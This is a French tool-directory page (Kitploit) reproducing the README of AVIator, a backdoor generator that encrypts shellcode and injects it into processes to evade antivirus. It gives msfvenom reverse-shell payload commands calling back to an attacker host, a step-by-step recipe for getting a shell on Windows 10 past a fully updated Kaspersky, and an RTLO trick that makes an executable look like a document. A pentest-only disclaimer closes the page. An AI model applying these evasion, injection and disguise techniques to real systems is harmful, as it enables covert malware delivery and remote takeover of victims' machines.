Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
AVIator — Projet d'évasion antivirus | Kitploit
Outils/GitHubGitHub/ch0pin/aviator
Outils de Chiffrement/DéchiffrementFrameworks d'ExploitationGénération de PayloadsShellcodeTests d'IntrusionRed TeamingArchived
GitHubch0pin/aviator

AVIator

Projet d'évasion antivirus

Voir le dépôt
1.2k230il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

AviAtor porté sur NETCore 5 avec une interface utilisateur mise à jour

AV|Ator

À propos://nom

AV : AntiVirus

Ator : est un épéiste, alchimiste, scientifique, magicien, érudit et ingénieur, capable parfois de produire des objets à partir de rien (https://en.wikipedia.org/wiki/Ator)

À propos://objectif

AV|Ator est un utilitaire de génération de backdoor, qui utilise des techniques cryptographiques et d’injection afin de contourner la détection AV. Plus précisément :

  • Il utilise le chiffrement AES pour chiffrer un shellcode donné
  • Génère un fichier exécutable qui contient la charge utile chiffrée
  • Le shellcode est déchiffré et injecté dans le système cible en utilisant diverses techniques d’injection

[https://attack.mitre.org/techniques/T1055/] :

  1. Injection de portable exécutable qui consiste à écrire du code malveillant directement dans le processus (sans fichier sur disque) puis à invoquer l’exécution avec du code supplémentaire ou en créant un thread distant. Le déplacement du code injecté introduit l’exigence supplémentaire de remapper les références mémoire. Des variantes de cette méthode telles que l’injection de DLL réflexive (écriture d’une DLL auto-mappée dans un processus) et le module mémoire (mapper la DLL lors de l’écriture dans le processus) résolvent le problème de relocalisation d’adresse.

  2. Détournement d’exécution de thread qui consiste à injecter du code malveillant ou le chemin d’une DLL dans un thread d’un processus. Similaire au Process Hollowing, le thread doit d’abord être suspendu.

Utilisation

L’application possède un formulaire composé de trois entrées principales (voir capture d’écran ci-dessous) :

Capture d’écran 2019-04-29 à 11 41 21

  1. Un texte contenant la clé de chiffrement utilisée pour chiffrer le shellcode
  2. Un texte contenant le IV utilisé pour le chiffrement AES
  3. Un texte contenant le shellcode

Remarque importante : le shellcode doit être fourni sous forme de tableau d’octets C#.

Les valeurs par défaut contiennent un shellcode qui exécute notepad.exe (32 bits). Cette démo est fournie comme indication de la façon dont le code doit être formaté (avec msfvenom, cela peut être facilement fait avec l’option -f csharp, par ex. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

Après avoir rempli les entrées fournies et sélectionné le chemin de sortie, un exécutable est généré selon les options choisies.

Option RTLO

En termes simples, usurper un fichier exécutable pour qu’il semble avoir une extension « innocente » comme 'pdf', 'txt', etc. Par ex. le fichier "testcod.exe" sera interprété comme "tesexe.doc"

Attention au fait que certains AV signalent l’usurpation comme un malware en soi.

Définir une icône personnalisée

Je suppose que vous savez tous ce que c’est :)

Contournement de Kaspersky AV sur un hôte Win 10 x64 (CAS DE TEST)

Obtenir un shell sur une machine Windows 10 exécutant Kaspersky AV entièrement mise à jour

Machine cible : Windows 10 x64

  1. Créer la charge utile avec msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Utiliser AVIator avec les paramètres suivants

    Architecture OS cible : x64

    Technique d’injection : Thread Hijacking (Architecture du shellcode : x64, Architecture OS : x64)

    Processus cible : explorer (laisser la valeur par défaut)

  3. Configurer l’écouteur sur la machine attaquante

  4. Exécuter le fichier exe généré sur la machine victime

Installation

Windows :

Soit compiler le projet, soit télécharger l’exécutable déjà compilé depuis le dossier suivant :

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux :

Installer Mono selon votre distribution Linux, télécharger et exécuter les binaires

Par ex. dans Kali :

root@kitploit:~
   root@kali# apt install mono-devel 
   
   root@kali# mono aviator.exe

Crédits

À Damon Mohammadbagher pour la procédure de chiffrement

Avertissement

J’ai développé cette application afin de relever les défis exigeants du processus de test d’intrusion et c’est la SEULE MANIÈRE dont cette application devrait être utilisée. Assurez-vous d’avoir l’autorisation requise pour l’utiliser contre un système et ne l’utilisez jamais à des fins illégales.

Télécharger l’outil